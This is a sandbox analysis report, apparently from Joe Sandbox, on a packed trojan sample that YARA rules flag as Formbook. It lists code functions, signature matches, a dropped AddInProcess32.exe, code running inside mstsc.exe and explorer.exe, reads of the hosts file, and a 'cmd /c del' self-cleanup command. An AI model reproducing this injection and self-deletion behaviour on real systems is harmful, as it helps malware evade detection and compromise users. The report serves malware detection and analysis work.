Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_088161A8 0_2_088161A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08810A28 0_2_08810A28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08818A48 0_2_08818A48
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08811D50 0_2_08811D50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08813F40 0_2_08813F40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_088178F0 0_2_088178F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08813801 0_2_08813801
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_0881003F 0_2_0881003F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08816198 0_2_08816198
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08815910 0_2_08815910
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08815920 0_2_08815920
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08816149 0_2_08816149
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08810A22 0_2_08810A22
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08818A38 0_2_08818A38
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08815499 0_2_08815499
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_088154A8 0_2_088154A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08816C60 0_2_08816C60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08816C70 0_2_08816C70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08811D42 0_2_08811D42
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08819658 0_2_08819658
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08819668 0_2_08819668
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08813F3F 0_2_08813F3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00401026 1_2_00401026
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00401174 1_2_00401174
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00401208 1_2_00401208
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0041E2AF 1_2_0041E2AF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00402D87 1_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00409E40 1_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0041E772 1_2_0041E772
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00712050 1_2_00712050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D4120 1_2_012D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BF900 1_2_012BF900
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0138E824 1_2_0138E824
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA830 1_2_012DA830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01371002 1_2_01371002
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E20A0 1_2_012E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013820A8 1_2_013820A8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012CB090 1_2_012CB090
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013828EC 1_2_013828EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01382B28 1_2_01382B28
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DAB40 1_2_012DAB40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0135CB4F 1_2_0135CB4F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EEBB0 1_2_012EEBB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E138B 1_2_012E138B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DEB9A 1_2_012DEB9A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013623E3 1_2_013623E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0137DBD2 1_2_0137DBD2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013703DA 1_2_013703DA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EABD8 1_2_012EABD8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DB236 1_2_012DB236
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0136FA2B 1_2_0136FA2B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013822AE 1_2_013822AE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01374AEF 1_2_01374AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B0D20 1_2_012B0D20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01382D07 1_2_01382D07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01381D55 1_2_01381D55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E2581 1_2_012E2581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01372D82 1_2_01372D82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012CD5E0 1_2_012CD5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013825DD 1_2_013825DD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C841F 1_2_012C841F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0137D466 1_2_0137D466
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DB477 1_2_012DB477
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01374496 1_2_01374496
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01381FF1 1_2_01381FF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0138DFCE 1_2_0138DFCE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D6E30 1_2_012D6E30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0137D616 1_2_0137D616
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01361EB6 1_2_01361EB6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01382EF7 1_2_01382EF7
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0478841F 6_2_0478841F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0483D466 6_2_0483D466
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04832D82 6_2_04832D82
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04770D20 6_2_04770D20
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048425DD 6_2_048425DD
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04842D07 6_2_04842D07
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0478D5E0 6_2_0478D5E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04841D55 6_2_04841D55
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047A2581 6_2_047A2581
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04821EB6 6_2_04821EB6
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04796E30 6_2_04796E30
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04842EF7 6_2_04842EF7
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04795600 6_2_04795600
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0483D616 6_2_0483D616
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0484DFCE 6_2_0484DFCE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04841FF1 6_2_04841FF1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048420A8 6_2_048420A8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479A830 6_2_0479A830
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048428EC 6_2_048428EC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831002 6_2_04831002
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0484E824 6_2_0484E824
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047A20A0 6_2_047A20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0478B090 6_2_0478B090
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04794120 6_2_04794120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0477F900 6_2_0477F900
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047999BF 6_2_047999BF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048422AE 6_2_048422AE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B236 6_2_0479B236
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834AEF 6_2_04834AEF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0482FA2B 6_2_0482FA2B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479AB40 6_2_0479AB40
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0483DBD2 6_2_0483DBD2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048303DA 6_2_048303DA
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048223E3 6_2_048223E3
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479A309 6_2_0479A309
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AABD8 6_2_047AABD8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04842B28 6_2_04842B28
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AEBB0 6_2_047AEBB0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0481CB4F 6_2_0481CB4F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479EB9A 6_2_0479EB9A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047A138B 6_2_047A138B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015E2AF 6_2_0015E2AF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00142D90 6_2_00142D90
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00142D87 6_2_00142D87
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00149E40 6_2_00149E40
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015E772 6_2_0015E772
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00142FB0 6_2_00142FB0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: String function: 012BB150 appears 145 times
Source: C:\Windows\SysWOW64\mstsc.exe Code function: String function: 0477B150 appears 145 times
One or more processes crash
Source: unknown Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3424 -s 8832
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSHCore1.dll0 vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000000.662946839.00000000000CC000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIMG_4785.exeH vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687367070.00000000087E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPe6.dll" vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686994540.00000000055B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_7abfb1f1fbdbd7c2322150249348b63f54b8a170_10665708_1ba816b7\Report.wer, type: DROPPED Matched rule: SUSP_WER_Critical_HeapCorruption date = 2019-10-18, author = Florian Roth, description = Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), reference = https://twitter.com/cyb3rops/status/1185459425710092288, score =
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@11/24@5/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_01
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3424
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Jump to behavior
Source: unknown Process created: C:\Windows\explorer.exe
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Virustotal: Detection: 28%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: unknown Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: unknown Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3424 -s 8832
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown Process created: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
Source: unknown Process created: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32 Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: Windows.Data.Activities.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: syncreg.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: CapabilityAccessManagerClient.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.Search.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: authui.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Signals.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.747630209.000001EDC50E0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: AddInProcess32.exe, mstsc.exe
Source: Binary string: HolographicExtensions.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000001.00000000.675621631.0000000000712000.00000002.00020000.sdmp, mstsc.exe, 00000006.00000002.1034631298.0000000004C7F000.00000004.00000001.sdmp
Source: Binary string: LanguageOverlayUtil.pdb}S source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
